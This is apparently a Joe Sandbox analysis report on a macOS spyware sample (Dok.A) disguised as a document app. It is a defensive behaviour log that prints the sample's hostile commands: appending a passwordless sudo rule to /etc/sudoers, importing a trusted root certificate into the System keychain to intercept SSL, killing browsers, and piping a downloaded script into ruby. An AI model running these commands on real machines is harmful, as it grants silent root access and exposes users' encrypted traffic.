Analysis Report

Overview

General Information

Joe Sandbox Version:	19.0.0
Analysis ID:	36981
Start time:	15:30:39
Joe Sandbox Product:	Cloud
Start date:	02.05.2017
Overall analysis duration:	0h 12m 28s
Report type:	full
Sample file name:	7819ae7d72fa045baa77e9c8e063a69df439146b27f9c3bb10aef52dcc77c145.app
Cookbook file name:	default.jbs
Analysis system description:	Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_25)
Detection:	MAL
Classification:	mal100.spyw.expl.evad.macAPP@0/24@2/0

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Classification

Signature Overview

Click to jump to signature section

Cryptography:

Imports (root) certificates into the systems keychain usually to intercept SSL traffic or bypass code integrity protections

Show sources

Source: /bin/bash (PID: 477)

Certificate import: /usr/bin/security -> security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/cert.der

Networking:

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: raw.githubusercontent.com

Reads from file descriptors related to (network) sockets

Show sources

Source: /usr/bin/curl (PID: 483)

Reads from socket in process:

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown	Network traffic detected: HTTP traffic on port 49205 -> 443

Writes from file descriptors related to (network) sockets

Show sources

Source: /usr/bin/curl (PID: 483)

Writes from socket in process:

System Summary:

Classification label

Show sources

Source: classification engine

Classification label: mal100.spyw.expl.evad.macAPP@0/24@2/0

Submitted sample is a known malware sample

Show sources

Source: MD5 e8bdde90574d5bf285d9abb0c8a113a8

Submitted blacklisted sample: Spyware Dok.A

Persistence and Installation Behavior:

Executes the "awk" command used to scan for patterns (usually in standard output)

Show sources

Source: /bin/sh (PID: 529)

Awk executable: /usr/bin/awk -> awk -F* /^ +\*/ {print $2}

Executes the "sed" command used to modify input streams (usually from files or pipes)

Show sources

Source: /bin/sh (PID: 530)

Sed executable: /usr/bin/sed -> sed s/^ *//

Reads data from the local random generator

Show sources

Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Random device file read: /dev/random
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Random device file read: /dev/random
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Random device file read: /dev/random
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Random device file read: /dev/random
Source: /usr/bin/security (PID: 477)	Random device file read: /dev/random
Source: /usr/bin/curl (PID: 483)	Random device file read: /dev/random
Source: /usr/bin/curl (PID: 483)	Random device file read: /dev/random
Source: /usr/bin/ruby (PID: 485)	Random device file read: /dev/urandom
Source: /usr/libexec/diskmanagementd (PID: 535)	Random device file read: /dev/random

Submitted sample is a bundle that is signed

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	CodeSignature CodeResources file read: /Users/vreni/Desktop/unpack/Dokument.app/Contents/_CodeSignature/CodeResources
Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	CodeSignature CodeResources file read: /Users/vreni/Desktop/unpack/Dokument.app/Contents/_CodeSignature/CodeResources

Uses AppleKeyboardLayouts bundle containing keyboard layouts

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Writes property list (.plist) files to disk

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	XML plist file created: /Users/Shared/AppStore.app/Contents/_CodeSignature/CodeResources
Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	XML plist file created: /Users/Shared/AppStore.app/Contents/Info.plist
Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Binary plist file created: /Users/Shared/AppStore.app/Contents/Resources/Base.lproj/MainMenu.nib
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	XML plist file created: /private/tmp/.dat.nosync01cc.r9KKsW
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	XML plist file created: /private/tmp/.dat.nosync01cc.kN1IYD
Source: /System/Library/SystemConfiguration/PrinterNotifications.bundle/Contents/MacOS/makequeues (PID: 533)	XML plist file created: /Library/Printers/InstalledPrinters.plist

Changes permissions of written Mach-O files

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)

Permissions modifiied for written 64-bit Mach-O /Users/Shared/AppStore.app/Contents/MacOS/AppStore: bits: - usr: rx grp: rx all: rwx

Creates hidden files, links and/or directories

Show sources

Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Hidden file created: /tmp/.dat.nosync01cc.r9KKsW
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Hidden file created: /tmp/.dat.nosync01cc.kN1IYD
Source: /usr/bin/touch (PID: 525)	Hidden file created: /tmp/.com.apple.dt.CommandLineTools.installondemand.in-progress

Executes Ruby scripts via command line evaluation

Show sources

Source: /usr/bin/sudo (PID: 485)

Ruby script executed using -e: /usr/bin/ruby -> /usr/bin/ruby -e #!/System/Library/Frameworks/Ruby.framework/Versions/Current/usr/bin/ruby# This script installs to /usr/local only. To install elsewhere you can just# untar https://github.com/Homebrew/brew/tarball/master anywhere you like or# change the value of HOMEBREW_PREFIX.HOMEBREW_PREFIX = '/usr/local'.freezeHOMEBREW_REPOSITORY = '/usr/local/Homebrew'.freezeHOMEBREW_CACHE = '#{ENV['HOME']}/Library/Caches/Homebrew'.freezeHOMEBREW_OLD_CACHE = '/Library/Caches/Homebrew'.freezeBREW_REPO = 'https://github.com/Homebrew/brew'.freezeCORE_TAP_REPO = 'https://github.com/Homebrew/homebrew-core'.freeze# no analytics during installationENV['HOMEBREW_NO_ANALYTICS_THIS_RUN'] = '1'ENV['HOMEBREW_NO_ANALYTICS_MESSAGE_OUTPUT'] = '1'module Tty module_function def blue bold 34 end def red bold 31 end def reset escape 0 end def bold(n = 39) escape '1 #{n}' end def underline escape '4 39' end def escape(n) '\033[#{n}m' if STDOUT.tty? ende

Executes commands using a shell command-line interpreter

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Shell command executed: /bin/bash -c chmod +x /Users/Shared/AppStore.app
Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Shell command executed: /bin/bash -c sleep 5 && rm -fR '/Users/vreni/Downloads/Dokument.app' && '/Users/Shared/AppStore.app/Contents/MacOS/AppStore' Dokument
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 471)	Shell command executed: /bin/sh -c /Users/Shared/AppStore.app/Contents/MacOS/AppStore
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Shell command executed: /bin/bash -c echo 'vreni ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Shell command executed: /bin/bash -c killall Safari
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Shell command executed: /bin/bash -c killall firefox
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Shell command executed: /bin/bash -c killall 'Google Chrome'
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Shell command executed: /bin/bash -c security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/cert.der
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Shell command executed: /bin/bash -c sudo -u vreni /usr/local/bin/brew -v
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Shell command executed: /bin/bash -c sudo -u vreni echo \|sudo -u vreni /usr/bin/ruby -e '$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)'
Source: /usr/bin/ruby (PID: 486)	Shell command executed: sh -c xcode-select --print-path >/dev/null 2>&1 && xcrun --sdk macosx --show-sdk-path 2>/dev/null
Source: /usr/bin/ruby (PID: 488)	Shell command executed: sh -c /usr/bin/sudo -n -v 2>/dev/null
Source: /usr/bin/ruby (PID: 491)	Shell command executed: sh -c dsmemberutil checkmembership -U 'vreni' -G admin
Source: /usr/bin/ruby (PID: 522)	Shell command executed: sh -c /usr/bin/xcode-select -print-path 2>/dev/null
Source: /usr/bin/ruby (PID: 526)	Shell command executed: sh -c softwareupdate -l \| grep -B 1 -E 'Command Line (Developer\|Tools)' \| awk -F'' '/^ +\/ {print $2}' \| sed 's/^ *//' \| tail -n1

Executes the "chgrp" command used to modify group ownership

Show sources

Source: /usr/bin/sudo (PID: 499)	Chgrp executable: /usr/bin/chgrp -> /usr/bin/chgrp admin /usr/local/bin
Source: /usr/bin/sudo (PID: 509)	Chgrp executable: /usr/bin/chgrp -> /usr/bin/chgrp admin /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var

Executes the "chmod" command used to modify permissions

Show sources

Source: /bin/bash (PID: 455)	Chmod executable: /bin/chmod -> chmod +x /Users/Shared/AppStore.app
Source: /usr/bin/sudo (PID: 493)	Chmod executable: /bin/chmod -> /bin/chmod u+rwx /usr/local/bin
Source: /usr/bin/sudo (PID: 495)	Chmod executable: /bin/chmod -> /bin/chmod g+rwx /usr/local/bin
Source: /usr/bin/sudo (PID: 503)	Chmod executable: /bin/chmod -> /bin/chmod g+rwx /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
Source: /usr/bin/sudo (PID: 505)	Chmod executable: /bin/chmod -> /bin/chmod 755 /usr/local/share/zsh /usr/local/share/zsh/site-functions
Source: /usr/bin/sudo (PID: 513)	Chmod executable: /bin/chmod -> /bin/chmod g+rwx /Users/vreni/Library/Caches/Homebrew
Source: /usr/bin/sudo (PID: 519)	Chmod executable: /bin/chmod -> /bin/chmod g+rwx /Library/Caches/Homebrew

Executes the "curl" command used to transfer data via the network (usually using HTTP/S)

Show sources

Source: /bin/bash (PID: 483)

Curl executable: /usr/bin/curl -> curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install

Executes the "grep" command used to find patterns in files or piped streams

Show sources

Source: /bin/sh (PID: 528)

Grep executable: /usr/bin/grep -> grep -B 1 -E Command Line (Developer|Tools)

Executes the "mkdir" command used to create folders

Show sources

Source: /usr/bin/sudo (PID: 501)	Mkdir executable: /bin/mkdir -> /bin/mkdir -p /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
Source: /usr/bin/sudo (PID: 511)	Mkdir executable: /bin/mkdir -> /bin/mkdir -p /Users/vreni/Library/Caches/Homebrew
Source: /usr/bin/sudo (PID: 517)	Mkdir executable: /bin/mkdir -> /bin/mkdir -p /Library/Caches/Homebrew

Executes the "ruby" command used to interprete Ruby scripts

Show sources

Source: /usr/bin/sudo (PID: 485)

Ruby executable: /usr/bin/ruby -> /usr/bin/ruby -e #!/System/Library/Frameworks/Ruby.framework/Versions/Current/usr/bin/ruby# This script installs to /usr/local only. To install elsewhere you can just# untar https://github.com/Homebrew/brew/tarball/master anywhere you like or# change the value of HOMEBREW_PREFIX.HOMEBREW_PREFIX = '/usr/local'.freezeHOMEBREW_REPOSITORY = '/usr/local/Homebrew'.freezeHOMEBREW_CACHE = '#{ENV['HOME']}/Library/Caches/Homebrew'.freezeHOMEBREW_OLD_CACHE = '/Library/Caches/Homebrew'.freezeBREW_REPO = 'https://github.com/Homebrew/brew'.freezeCORE_TAP_REPO = 'https://github.com/Homebrew/homebrew-core'.freeze# no analytics during installationENV['HOMEBREW_NO_ANALYTICS_THIS_RUN'] = '1'ENV['HOMEBREW_NO_ANALYTICS_MESSAGE_OUTPUT'] = '1'module Tty module_function def blue bold 34 end def red bold 31 end def reset escape 0 end def bold(n = 39) escape '1 #{n}' end def underline escape '4 39' end def escape(n) '\033[#{n}m' if STDOUT.tty? ende

Executes the "touch" command used to create files or modify time stamps

Show sources

Source: /usr/bin/sudo (PID: 525)

Touch executable: /usr/bin/touch -> /usr/bin/touch /tmp/.com.apple.dt.CommandLineTools.installondemand.in-progress

Reads launchservices plist files

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

Reads user launchservices plist file containing default apps for corresponding filetypes

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

Uses AppleScript framework/components containing Apple Script related functionalities

Show sources

Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist

Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Show sources

Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist

Writes 64-bit Mach-O files to disk

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)

File written: /Users/Shared/AppStore.app/Contents/MacOS/AppStore

Writes certificate files to disk

Show sources

Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)

DER file created: /private/tmp/cert.der

Writes icon files to disk

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)

File written: /Users/Shared/AppStore.app/Contents/Resources/AppIcon.icns

Changes permissions of common UNIX (system) binary directories

Show sources

Source: /usr/bin/sudo (PID: 493)	Chmod directory: /bin/chmod -> /bin/chmod u+rwx /usr/local/bin
Source: /usr/bin/sudo (PID: 495)	Chmod directory: /bin/chmod -> /bin/chmod g+rwx /usr/local/bin
Source: /usr/bin/sudo (PID: 503)	Chmod directory: /bin/chmod -> /bin/chmod g+rwx /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
Source: /usr/bin/sudo (PID: 505)	Chmod directory: /bin/chmod -> /bin/chmod 755 /usr/local/share/zsh /usr/local/share/zsh/site-functions
Source: /usr/bin/sudo (PID: 513)	Chmod directory: /bin/chmod -> /bin/chmod g+rwx /Users/vreni/Library/Caches/Homebrew
Source: /usr/bin/sudo (PID: 519)	Chmod directory: /bin/chmod -> /bin/chmod g+rwx /Library/Caches/Homebrew

Executes the "dsmemberutil" command used to retrieve user membership information

Show sources

Source: /bin/sh (PID: 491)

Dsmemberutil executable: /usr/bin/dsmemberutil -> dsmemberutil checkmembership -U vreni -G admin

Executes the "rm" command used to delete files or directories

Show sources

Source: /bin/bash (PID: 459)

Rm executable: /bin/rm -> rm -fR /Users/vreni/Downloads/Dokument.app

Executes the "softwareupdate" command used to check for new Apple related software and updates

Show sources

Source: /bin/sh (PID: 527)	Softwareupdate executable: /usr/sbin/softwareupdate -> softwareupdate -l
Source: /usr/bin/sudo (PID: 545)	Softwareupdate executable: /usr/sbin/softwareupdate -> /usr/sbin/softwareupdate -i Command Line Tools (macOS El Capitan version 10.11) for Xcode-8.2

Executes the "sudo" command used to execute a command as another user

Show sources

Source: /bin/bash (PID: 478)	Sudo executable: /usr/bin/sudo -> sudo -u vreni /usr/local/bin/brew -v
Source: /bin/bash (PID: 480)	Sudo executable: /usr/bin/sudo -> sudo -u vreni echo
Source: /bin/bash (PID: 481)	Sudo executable: /usr/bin/sudo -> sudo -u vreni /usr/bin/ruby -e #!/System/Library/Frameworks/Ruby.framework/Versions/Current/usr/bin/ruby# This script installs to /usr/local only. To install elsewhere you can just# untar https://github.com/Homebrew/brew/tarball/master anywhere you like or# change the value of HOMEBREW_PREFIX.HOMEBREW_PREFIX = '/usr/local'.freezeHOMEBREW_REPOSITORY = '/usr/local/Homebrew'.freezeHOMEBREW_CACHE = '#{ENV['HOME']}/Library/Caches/Homebrew'.freezeHOMEBREW_OLD_CACHE = '/Library/Caches/Homebrew'.freezeBREW_REPO = 'https://github.com/Homebrew/brew'.freezeCORE_TAP_REPO = 'https://github.com/Homebrew/homebrew-core'.freeze# no analytics during installationENV['HOMEBREW_NO_ANALYTICS_THIS_RUN'] = '1'ENV['HOMEBREW_NO_ANALYTICS_MESSAGE_OUTPUT'] = '1'module Tty module_function def blue bold 34 end def red bold 31 end def reset escape 0 end def bold(n = 39) escape '1 #{n}' end def underline escape '4 39' end def escape(n) '\033[#{n}m' if STDOU
Source: /bin/sh (PID: 489)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -n -v
Source: /usr/bin/ruby (PID: 492)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/chmod u+rwx /usr/local/bin
Source: /usr/bin/ruby (PID: 494)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/chmod g+rwx /usr/local/bin
Source: /usr/bin/ruby (PID: 496)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/sbin/chown vreni /usr/local/bin
Source: /usr/bin/ruby (PID: 498)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/bin/chgrp admin /usr/local/bin
Source: /usr/bin/ruby (PID: 500)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/mkdir -p /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
Source: /usr/bin/ruby (PID: 502)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/chmod g+rwx /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
Source: /usr/bin/ruby (PID: 504)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/chmod 755 /usr/local/share/zsh /usr/local/share/zsh/site-functions
Source: /usr/bin/ruby (PID: 506)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/sbin/chown vreni /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
Source: /usr/bin/ruby (PID: 508)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/bin/chgrp admin /usr/local/Cellar /usr/local/Homebrew /usr/local/Frameworks /usr/local/etc /usr/local/include /usr/local/lib /usr/local/opt /usr/local/sbin /usr/local/share /usr/local/share/zsh /usr/local/share/zsh/site-functions /usr/local/var
Source: /usr/bin/ruby (PID: 510)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/mkdir -p /Users/vreni/Library/Caches/Homebrew
Source: /usr/bin/ruby (PID: 512)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/chmod g+rwx /Users/vreni/Library/Caches/Homebrew
Source: /usr/bin/ruby (PID: 514)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/sbin/chown vreni /Users/vreni/Library/Caches/Homebrew
Source: /usr/bin/ruby (PID: 516)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/mkdir -p /Library/Caches/Homebrew
Source: /usr/bin/ruby (PID: 518)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /bin/chmod g+rwx /Library/Caches/Homebrew
Source: /usr/bin/ruby (PID: 520)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/sbin/chown vreni /Library/Caches/Homebrew
Source: /usr/bin/ruby (PID: 524)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/bin/touch /tmp/.com.apple.dt.CommandLineTools.installondemand.in-progress
Source: /usr/bin/ruby (PID: 544)	Sudo executable: /usr/bin/sudo -> /usr/bin/sudo /usr/sbin/softwareupdate -i Command Line Tools (macOS El Capitan version 10.11) for Xcode-8.2

Executes the "xcode-select" command used to retrieve developer environment information

Show sources

Source: /bin/sh (PID: 487)	Xcode-select executable: /usr/bin/xcode-select -> xcode-select --print-path
Source: /bin/sh (PID: 523)	Xcode-select executable: /usr/bin/xcode-select -> /usr/bin/xcode-select -print-path

Explicitly checks for user admin membership

Show sources

Source: /bin/sh (PID: 491)

Dsmemberutil checkmembership of admin: /usr/bin/dsmemberutil -> dsmemberutil checkmembership -U vreni -G admin

Explicitly terminates browser processes

Show sources

Source: /bin/bash (PID: 474)	Kills 'Safari'browser processes: killall Safari
Source: /bin/bash (PID: 475)	Kills 'Firefox'browser processes: killall firefox
Source: /bin/bash (PID: 476)	Kills 'Chrome'browser processes: killall Google Chrome

Installs Xcode Command Line Tools used for compiling software

Show sources

Source: /usr/bin/ruby (PID: 544)	Installation of Xcode CLI tools: /usr/bin/sudo -> /usr/bin/sudo /usr/sbin/softwareupdate -i Command Line Tools (macOS El Capitan version 10.11) for Xcode-8.2
Source: /usr/bin/sudo (PID: 545)	Installation of Xcode CLI tools: /usr/sbin/softwareupdate -> /usr/sbin/softwareupdate -i Command Line Tools (macOS El Capitan version 10.11) for Xcode-8.2

Installs new Apple related software and updates

Show sources

Source: /usr/bin/ruby (PID: 544)	Software installation: /usr/bin/sudo -> /usr/bin/sudo /usr/sbin/softwareupdate -i Command Line Tools (macOS El Capitan version 10.11) for Xcode-8.2
Source: /usr/bin/sudo (PID: 545)	Software installation: /usr/sbin/softwareupdate -> /usr/sbin/softwareupdate -i Command Line Tools (macOS El Capitan version 10.11) for Xcode-8.2

Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)

Show sources

Source: /bin/sh (PID: 471)	Shell process: /Users/Shared/AppStore.app/Contents/MacOS/AppStore
Source: /bin/sh (PID: 487)	Shell process: xcode-select --print-path
Source: /bin/sh (PID: 489)	Shell process: /usr/bin/sudo -n -v
Source: /bin/sh (PID: 491)	Shell process: dsmemberutil checkmembership -U vreni -G admin
Source: /bin/sh (PID: 523)	Shell process: /usr/bin/xcode-select -print-path
Source: /bin/sh (PID: 527)	Shell process: softwareupdate -l
Source: /bin/sh (PID: 528)	Shell process: grep -B 1 -E Command Line (Developer\|Tools)
Source: /bin/sh (PID: 529)	Shell process: awk -F* /^ +\*/ {print $2}
Source: /bin/sh (PID: 530)	Shell process: sed s/^ *//
Source: /bin/sh (PID: 531)	Shell process: tail -n1

Terminates several processes with shell command 'killall'

Show sources

Source: /bin/bash (PID: 474)	Killall command executed: killall Safari
Source: /bin/bash (PID: 475)	Killall command executed: killall firefox
Source: /bin/bash (PID: 476)	Killall command executed: killall Google Chrome

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)

Show sources

Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)

Sysctl read request: kern.safeboot (1.66)

Bypasses sudo password prompts by disabling it in the sudoers file

Show sources

Source: /bin/bash (PID: 473)

File written: /private/etc/sudoers -> vreni ALL=(ALL) NOPASSWD: ALL.

Modifies the sudoers file used to configure command execution as another user

Show sources

Source: /bin/bash (PID: 473)

File written: /private/etc/sudoers -> vreni ALL=(ALL) NOPASSWD: ALL.

Language, Device and Operating System Detection:

Reads the system or server version plist file

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/sw_vers (PID: 490)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Queries OS software version with shell command 'sw_vers'

Show sources

Source: /usr/bin/ruby (PID: 490)

sw_vers executed: /usr/bin/sw_vers -productVersion

Reads hardware related sysctl values

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Sysctl read request: hw.availcpu (6.25)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Sysctl read request: hw.ncpu (6.3)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Sysctl read request: hw.availcpu (6.25)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Sysctl read request: hw.ncpu (6.3)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Sysctl read request: hw.availcpu (6.25)

Reads the kernel OS version value

Show sources

Source: /Users/vreni/Desktop/unpack/Dokument.app/Contents/MacOS/AppStore (PID: 453)	Sysctl read request: kern.osversion (1.65)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 460)	Sysctl read request: kern.osversion (1.65)
Source: /Users/Shared/AppStore.app/Contents/MacOS/AppStore (PID: 471)	Sysctl read request: kern.osversion (1.65)

Reads the systems OS release and/or type

Show sources

Source: /usr/bin/curl (PID: 483)	Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/SystemConfiguration/PrinterNotifications.bundle/Contents/MacOS/makequeues (PID: 533)	Sysctl requested: kern.ostype (1.1)
Source: /System/Library/SystemConfiguration/PrinterNotifications.bundle/Contents/MacOS/makequeues (PID: 533)	Sysctl requested: kern.osrelease (1.2)

Reads the systems hostname

Show sources

Source: /bin/bash (PID: 455)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 456)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 471)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 473)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 474)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 475)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 476)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 477)	Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 478)	Sysctl requested: kern.hostname (1.10)
